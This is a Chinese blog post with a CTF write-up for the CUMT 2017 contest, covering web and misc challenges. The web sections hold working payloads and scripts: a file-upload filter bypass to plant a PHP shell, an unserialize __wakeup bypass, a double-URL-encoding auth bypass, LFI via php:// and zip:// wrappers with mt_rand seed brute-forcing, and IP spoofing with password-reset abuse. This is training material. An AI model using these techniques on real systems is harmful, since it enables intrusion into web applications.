<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">



  <meta name="description" content="CUMT2017赛宁杯"/>




  <meta name="keywords" content="ctf, writeup, 八一" />



  <meta name="baidu-site-verification" content="HhUstaSjr0" />



  <meta name="google-site-verification" content="UA-102975942-1" />






  <link rel="alternate" href="/atom.xml" title="八一">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.6.0" />



<link rel="canonical" href="https://bay1.top/2017/06/07/CUMT2017赛宁杯/"/>


<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.6.0" />
<link rel="stylesheet" type="text/css" href="/css/prettify.css" media="screen" />
<link rel="stylesheet" type="text/css" href="/css/sons-of-obsidian.css" media="screen" />



  <link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />




  
  <script id="baidu_analytics">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?9a885cc9fb6cd7bcef579deb8efe8a70";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>



  <script id="google_analytics">
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

        ga('create', 'UA-102975942-1', 'auto');
        ga('send', 'pageview');
  </script>










    <title> CUMT2017赛宁杯 - 八一 </title>
  </head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">八一</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    
      <a href="/archives">
        <li class="mobile-menu-item">
          
          
            文章
          
        </li>
      </a>
    
      <a href="/tags">
        <li class="mobile-menu-item">
          
          
            标签
          
        </li>
      </a>
    
      <a href="/about">
        <li class="mobile-menu-item">
          
          
            关于/友链
          
        </li>
      </a>
    
      <a href="/search">
        <li class="mobile-menu-item">
          
          
            站内搜索
          
        </li>
      </a>
    
  </ul>
</nav>

    <div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">八一</a>
</div>

<nav class="site-navbar">
  
    <ul id="menu" class="menu">
      
        <li class="menu-item">
          <a class="menu-item-link" href="/archives">
            
            
              文章
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/tags">
            
            
              标签
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/about">
            
            
              关于/友链
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/search">
            
            
              站内搜索
            
          </a>
        </li>
      
    </ul>
  
</nav>

      </header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content">
            
  
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          CUMT2017赛宁杯
        
      </h1>

      <div class="post-meta">
        <span class="post-time">
          2017-06-07
        </span>
        
        
        
      </div>
    </header>

    
    
  <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#upload"><span class="toc-text">upload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#unserialize3"><span class="toc-text">unserialize3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP2"><span class="toc-text">PHP2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#guess"><span class="toc-text">guess</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easyweb"><span class="toc-text">easyweb</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#摩斯电码"><span class="toc-text">摩斯电码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#hong"><span class="toc-text">hong</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#misc-pic-again"><span class="toc-text">misc_pic_again</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rfc"><span class="toc-text">rfc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bitwise"><span class="toc-text">Bitwise</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#小结"><span class="toc-text">小结</span></a></li></ol>
    </div>
  </div>


    <div class="post-content">
      
        <p>。。。。。。<a id="more"></a></p>
<blockquote>
<p>由于下午去学生在线要验收任务，就做了大半天吧<br>这些题目，学长们都懒得出wp了。。。。我就稍微写点东西吧</p>
</blockquote>
<h2 id="upload"><a href="#upload" class="headerlink" title="upload"></a>upload</h2><blockquote>
<p>打开页面，上传页面，上传绕过，直接上传php,有拦截，修改JS<br>然后传个大马，掏出bp</p>
</blockquote>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">upfile = <span class="built_in">document</span>.getElementById(<span class="string">"upfile"</span>);</span><br><span class="line">submit = <span class="built_in">document</span>.getElementById(<span class="string">"submit"</span>);</span><br><span class="line">name = upfile.value;</span><br><span class="line">ext = name.replace(<span class="regexp">/^.+\./</span>,<span class="string">''</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>([<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'php'</span>].contains(ext))&#123;</span><br><span class="line">	submit.disabled = <span class="literal">false</span>; <span class="comment">//把php加进去</span></span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">	submit.disabled = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line">	alert(<span class="string">'请选择一张图片文件上传!'</span>);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>修改文件类型为：image/gif</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSf2T0.png" alt="upload"></p>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfWkV.png" alt="upload"></p>
<p><img src="https://s1.ax1x.com/2018/01/01/pSffYT.png" alt="upload"></p>
<h2 id="unserialize3"><a href="#unserialize3" class="headerlink" title="unserialize3"></a>unserialize3</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">xctf</span></span>&#123; </span><br><span class="line"><span class="keyword">public</span> $flag = <span class="string">'111'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span></span>&#123;</span><br><span class="line"><span class="keyword">exit</span>(<span class="string">'bad requests'</span>);</span><br><span class="line">&#125;</span><br><span class="line">?code=</span><br></pre></td></tr></table></figure>
<blockquote>
<p>标题和代码很容易知道写个脚本，绕过__wakeup就OK了<br>payload=xxxxx/?code=O:4:%22xctf%22:2:{s:4:%22flag%22;s:3:%22111%22;}</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">xctf</span></span>&#123; </span><br><span class="line">	<span class="keyword">public</span> $flag = <span class="string">'111'</span>;</span><br><span class="line">&#125;</span><br><span class="line">$abc = <span class="keyword">new</span> xctf();</span><br><span class="line"><span class="keyword">echo</span> serialize($abc);</span><br></pre></td></tr></table></figure>
<h2 id="PHP2"><a href="#PHP2" class="headerlink" title="PHP2"></a>PHP2</h2><blockquote>
<p>代开链接显示：Can you anthenticate to this website?其他什么也没有。。。先开始尝试后缀<br>index.php.txt,index.txt,index.php.swp……然后就是啥也没有，尝试搜了搜anthenticate出了原题。。。<br>看完原题，我就感觉这道题被他改坏了。。。。。。<span style="color:red;">原题里源代码有提示在index.phps好不好。。。。。</span><br>进入index.phps得到源码</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="string">"admin"</span>===$_GET[id]) &#123;</span><br><span class="line">  <span class="keyword">echo</span>(<span class="string">"&lt;p&gt;not allowed!&lt;/p&gt;"</span>);</span><br><span class="line">  <span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$_GET[id] = urldecode($_GET[id]);</span><br><span class="line"><span class="keyword">if</span>($_GET[id] == <span class="string">"admin"</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">"&lt;p&gt;Access granted!&lt;/p&gt;"</span>;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">"&lt;p&gt;Key: xxxxxxx &lt;/p&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">Can you anthenticate to this website?</span><br></pre></td></tr></table></figure>
<blockquote>
<p>就是二次化url就可以绕过并通过验证<br>payload=xxx/index.php?id=%2561%2564%256d%2569%256e</p>
</blockquote>
<h2 id="guess"><a href="#guess" class="headerlink" title="guess"></a>guess</h2><blockquote>
<p><span style="clor:red;">这是NJCTF原题</span><br>上传一张图片，发现链接变成了xxx/?page=upload<br>本地包含读取源码：xxx/?page=php://filter/convert.base64-encode/resource=upload和index<br>接下来的思路就是上传一个php压缩包（改名为png），再伪协议（zip或phar）读取马，得到shell<br>这次的主要问题在于，题目把路径加了一个前缀，需要爆破随机数种子才能利用</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">show_error_message</span><span class="params">($message)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"&lt;div class=\"msg error\" id=\"message\"&gt;</span></span><br><span class="line"><span class="string">    &lt;i class=\"fa fa-exclamation-triangle\"&gt;&lt;/i&gt;$message&lt;/div&gt;"</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">show_message</span><span class="params">($message)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">echo</span>(<span class="string">"&lt;div class=\"msg success\" id=\"message\"&gt;</span></span><br><span class="line"><span class="string">    &lt;i class=\"fa fa-exclamation-triangle\"&gt;&lt;/i&gt;$message&lt;/div&gt;"</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">random_str</span><span class="params">($length = <span class="string">"32"</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $set = <span class="keyword">array</span>(<span class="string">"a"</span>, <span class="string">"A"</span>, <span class="string">"b"</span>, <span class="string">"B"</span>, <span class="string">"c"</span>, <span class="string">"C"</span>, <span class="string">"d"</span>, <span class="string">"D"</span>, <span class="string">"e"</span>, <span class="string">"E"</span>, <span class="string">"f"</span>, <span class="string">"F"</span>,</span><br><span class="line">        <span class="string">"g"</span>, <span class="string">"G"</span>, <span class="string">"h"</span>, <span class="string">"H"</span>, <span class="string">"i"</span>, <span class="string">"I"</span>, <span class="string">"j"</span>, <span class="string">"J"</span>, <span class="string">"k"</span>, <span class="string">"K"</span>, <span class="string">"l"</span>, <span class="string">"L"</span>,</span><br><span class="line">        <span class="string">"m"</span>, <span class="string">"M"</span>, <span class="string">"n"</span>, <span class="string">"N"</span>, <span class="string">"o"</span>, <span class="string">"O"</span>, <span class="string">"p"</span>, <span class="string">"P"</span>, <span class="string">"q"</span>, <span class="string">"Q"</span>, <span class="string">"r"</span>, <span class="string">"R"</span>,</span><br><span class="line">        <span class="string">"s"</span>, <span class="string">"S"</span>, <span class="string">"t"</span>, <span class="string">"T"</span>, <span class="string">"u"</span>, <span class="string">"U"</span>, <span class="string">"v"</span>, <span class="string">"V"</span>, <span class="string">"w"</span>, <span class="string">"W"</span>, <span class="string">"x"</span>, <span class="string">"X"</span>,</span><br><span class="line">        <span class="string">"y"</span>, <span class="string">"Y"</span>, <span class="string">"z"</span>, <span class="string">"Z"</span>, <span class="string">"1"</span>, <span class="string">"2"</span>, <span class="string">"3"</span>, <span class="string">"4"</span>, <span class="string">"5"</span>, <span class="string">"6"</span>, <span class="string">"7"</span>, <span class="string">"8"</span>, <span class="string">"9"</span>);</span><br><span class="line">    $str = <span class="string">''</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> ($i = <span class="number">1</span>; $i &lt;= $length; ++$i) &#123;</span><br><span class="line">        $ch = mt_rand(<span class="number">0</span>, count($set) - <span class="number">1</span>);</span><br><span class="line">        $str .= $set[$ch];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> $str;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">session_start();</span><br><span class="line"></span><br><span class="line">$reg=<span class="string">'/gif|jpg|jpeg|png/'</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) &#123;</span><br><span class="line"></span><br><span class="line">    $seed = rand(<span class="number">0</span>,<span class="number">999999999</span>);</span><br><span class="line">    mt_srand($seed);</span><br><span class="line">    $ss = mt_rand();</span><br><span class="line">    $hash = md5(session_id() . $ss);</span><br><span class="line">    setcookie(<span class="string">'SESSI0N'</span>, $hash, time() + <span class="number">3600</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ($_FILES[<span class="string">"file"</span>][<span class="string">"error"</span>] &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        show_error_message(<span class="string">"Upload ERROR. Return Code: "</span> . $_FILES[<span class="string">"file-upload-field"</span>][<span class="string">"error"</span>]);</span><br><span class="line">    &#125;</span><br><span class="line">    $check2 = ((($_FILES[<span class="string">"file-upload-field"</span>][<span class="string">"type"</span>] == <span class="string">"image/gif"</span>)</span><br><span class="line">            || ($_FILES[<span class="string">"file-upload-field"</span>][<span class="string">"type"</span>] == <span class="string">"image/jpeg"</span>)</span><br><span class="line">            || ($_FILES[<span class="string">"file-upload-field"</span>][<span class="string">"type"</span>] == <span class="string">"image/pjpeg"</span>)</span><br><span class="line">            || ($_FILES[<span class="string">"file-upload-field"</span>][<span class="string">"type"</span>] == <span class="string">"image/png"</span>))</span><br><span class="line">        &amp;&amp; ($_FILES[<span class="string">"file-upload-field"</span>][<span class="string">"size"</span>] &lt; <span class="number">204800</span>));</span><br><span class="line">    $check3=!preg_match($reg,pathinfo($_FILES[<span class="string">'file-upload-field'</span>][<span class="string">'name'</span>], PATHINFO_EXTENSION));</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ($check3) show_error_message(<span class="string">"Nope!"</span>);</span><br><span class="line">    <span class="keyword">if</span> ($check2) &#123;</span><br><span class="line">        $filename = <span class="string">'./uP1O4Ds/'</span> . random_str() . <span class="string">'_'</span> . $_FILES[<span class="string">'file-upload-field'</span>][<span class="string">'name'</span>];</span><br><span class="line">        <span class="keyword">if</span> (move_uploaded_file($_FILES[<span class="string">'file-upload-field'</span>][<span class="string">'tmp_name'</span>], $filename)) &#123;</span><br><span class="line">            show_message(<span class="string">"Upload successfully. File type:"</span> . $_FILES[<span class="string">"file-upload-field"</span>][<span class="string">"type"</span>]);</span><br><span class="line">        &#125; <span class="keyword">else</span> show_error_message(<span class="string">"Something wrong with the upload..."</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        show_error_message(<span class="string">"only allow gif/jpeg/png files smaller than 200kb!"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">session_start();</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'page'</span>]))&#123;</span><br><span class="line">    $page=$_GET[<span class="string">'page'</span>];</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    $page=<span class="keyword">null</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">'/\.\./'</span>,$page))</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;div class=\"msg error\" id=\"message\"&gt;</span></span><br><span class="line"><span class="string">    &lt;i class=\"fa fa-exclamation-triangle\"&gt;&lt;/i&gt;Attack Detected!&lt;/div&gt;"</span>;</span><br><span class="line">    <span class="keyword">die</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($page)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">if</span>(!(<span class="keyword">include</span>($page.<span class="string">'.php'</span>)))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"&lt;div class=\"msg error\" id=\"message\"&gt;</span></span><br><span class="line"><span class="string">    &lt;i class=\"fa fa-exclamation-triangle\"&gt;&lt;/i&gt;error!&lt;/div&gt;"</span>;</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>问题代码</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$hash = md5(session_id().$ss);</span><br><span class="line">setcookie(<span class="string">'SESSI0N'</span>, $hash, time() + <span class="number">3600</span>);</span><br></pre></td></tr></table></figure>
<blockquote>
<p>先上传一个php压缩改名之后的png,得到session_id为我们的 PHPSESSID，hash为SESSI0N<br>第一种方法用php_mt_seed爆破mt_srand，首先cmd5解hash求得$ss<br>至于解cmd5,看代码部分对session_id().$ss进行md5，也就是我们如果把session_id()置空<br>就是纯数字的MD5，也就是要求的$ss<br>之后，用下图的名命令爆破<br>最后，用下面的脚本预测文件名<br>payload=xxx/?page=zip://uP1O4Ds/nZ2rdPYLpJqFNSmv4Kon8mGxfrWzYeqt_php.png%23php&amp;php</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfiJU.png" alt="seed"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">mt_srand(<span class="number">75123790</span>);</span><br><span class="line"><span class="keyword">echo</span> mt_rand();</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"\n\n"</span>;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">random_str</span><span class="params">($length = <span class="string">"32"</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $set = <span class="keyword">array</span>(<span class="string">"a"</span>, <span class="string">"A"</span>, <span class="string">"b"</span>, <span class="string">"B"</span>, <span class="string">"c"</span>, <span class="string">"C"</span>, <span class="string">"d"</span>, <span class="string">"D"</span>, <span class="string">"e"</span>, <span class="string">"E"</span>, <span class="string">"f"</span>, <span class="string">"F"</span>,</span><br><span class="line">        <span class="string">"g"</span>, <span class="string">"G"</span>, <span class="string">"h"</span>, <span class="string">"H"</span>, <span class="string">"i"</span>, <span class="string">"I"</span>, <span class="string">"j"</span>, <span class="string">"J"</span>, <span class="string">"k"</span>, <span class="string">"K"</span>, <span class="string">"l"</span>, <span class="string">"L"</span>,</span><br><span class="line">        <span class="string">"m"</span>, <span class="string">"M"</span>, <span class="string">"n"</span>, <span class="string">"N"</span>, <span class="string">"o"</span>, <span class="string">"O"</span>, <span class="string">"p"</span>, <span class="string">"P"</span>, <span class="string">"q"</span>, <span class="string">"Q"</span>, <span class="string">"r"</span>, <span class="string">"R"</span>,</span><br><span class="line">        <span class="string">"s"</span>, <span class="string">"S"</span>, <span class="string">"t"</span>, <span class="string">"T"</span>, <span class="string">"u"</span>, <span class="string">"U"</span>, <span class="string">"v"</span>, <span class="string">"V"</span>, <span class="string">"w"</span>, <span class="string">"W"</span>, <span class="string">"x"</span>, <span class="string">"X"</span>,</span><br><span class="line">        <span class="string">"y"</span>, <span class="string">"Y"</span>, <span class="string">"z"</span>, <span class="string">"Z"</span>, <span class="string">"1"</span>, <span class="string">"2"</span>, <span class="string">"3"</span>, <span class="string">"4"</span>, <span class="string">"5"</span>, <span class="string">"6"</span>, <span class="string">"7"</span>, <span class="string">"8"</span>, <span class="string">"9"</span>);</span><br><span class="line">    $str = <span class="string">''</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> ($i = <span class="number">1</span>; $i &lt;= $length; ++$i) &#123;</span><br><span class="line">        $ch = mt_rand(<span class="number">0</span>, count($set) - <span class="number">1</span>);</span><br><span class="line">        $str .= $set[$ch];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> $str;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> random_str().<span class="string">"\n\r"</span>;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>第二种方法利用脚本爆破出来,需要修改php配置文件运行时间可以无限长<br>这个方法比较慢。。。。。</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span>($i=<span class="number">0</span>;$i&lt;=<span class="number">999999999</span>;$i++)&#123;</span><br><span class="line">    $seed =$i;</span><br><span class="line">    mt_srand($seed);</span><br><span class="line">    $ss = mt_rand();</span><br><span class="line">    $session_id=<span class="string">"kfm3fk6doepaefpaa9al32h8j7"</span>;</span><br><span class="line">    $hash1 = md5($session_id. $ss);</span><br><span class="line">    $hash2 = <span class="string">"72a6022fd34bf1980ea8d20aafa3bd2a"</span>;</span><br><span class="line">    <span class="keyword">if</span>($hash1===$hash2)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"we get seed:"</span>.$i;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>($i==<span class="number">999999999</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"run down!we can't get it!"</span>;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'./uP1O4Ds/'</span> . random_str() . <span class="string">'_'</span>;</span><br></pre></td></tr></table></figure>
<h2 id="easyweb"><a href="#easyweb" class="headerlink" title="easyweb"></a>easyweb</h2><blockquote>
<p>哇，这道题虽然对学长们来说很简单，我还是长了不少知识<br>知识的那就是密码找回漏洞，上传绕过。最重要的是上传新姿势。。。。<br>首先随便注册一个账号，利用找回密码，重置admin账户</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfo6J.png" alt="user"></p>
<blockquote>
<p>进入admin页面，提示IP不被允许<br>伪造IP，改X-Forwarded-For为127.0.0.1，我是用的火狐插件，Bp也可以<br>然后打开admin页面源码，提示module=filemanage&amp;do=??<br>do参数upload,别问我怎么知道的，自己猜。你或者查查filemange<br>然后就是上传绕过,这是要构造一个图片马<br>而且php的标识可以如此，<a href="http://php.net/manual/en/language.basic-syntax.phptags.php" target="_blank" rel="noopener">script language=”php”</a><br>把下面的代码加到一张图片中就行了</p>
</blockquote>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language="php"&gt;phpinfo()&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://s1.ax1x.com/2018/01/01/pSR1AK.png" alt="easyweb"></p>
<h2 id="摩斯电码"><a href="#摩斯电码" class="headerlink" title="摩斯电码"></a>摩斯电码</h2><blockquote>
<p>调到高音模式</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSWJaV.png" alt="pitch"><br><img src="https://s1.ax1x.com/2018/01/01/pSRxUK.png" alt="mosi"></p>
<h2 id="hong"><a href="#hong" class="headerlink" title="hong"></a>hong</h2><blockquote>
<p>在linux下打开，使用foremost命令分离<br>得到图片含有flag</p>
</blockquote>
<h2 id="misc-pic-again"><a href="#misc-pic-again" class="headerlink" title="misc_pic_again"></a>misc_pic_again</h2><blockquote>
<p>原题改造，最后十六进制打开，以前写过<a href="https://bayi87.github.io/2017/03/02/%E5%A4%A9%E6%9C%9D%E6%8C%96%E7%85%A4ctf--1/" target="_blank" rel="noopener">原题</a></p>
</blockquote>
<h2 id="rfc"><a href="#rfc" class="headerlink" title="rfc"></a>rfc</h2><blockquote>
<p>teucbonojmsvrhlzdglgsaleccpehqikrwfxupoeteayofairifneihr,栅栏解密，为啥？？试试。。。。</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSf9oV.png" alt="rfc"></p>
<h2 id="Bitwise"><a href="#Bitwise" class="headerlink" title="Bitwise"></a>Bitwise</h2><blockquote>
<p>下载附件，是个py脚本</p>
</blockquote>
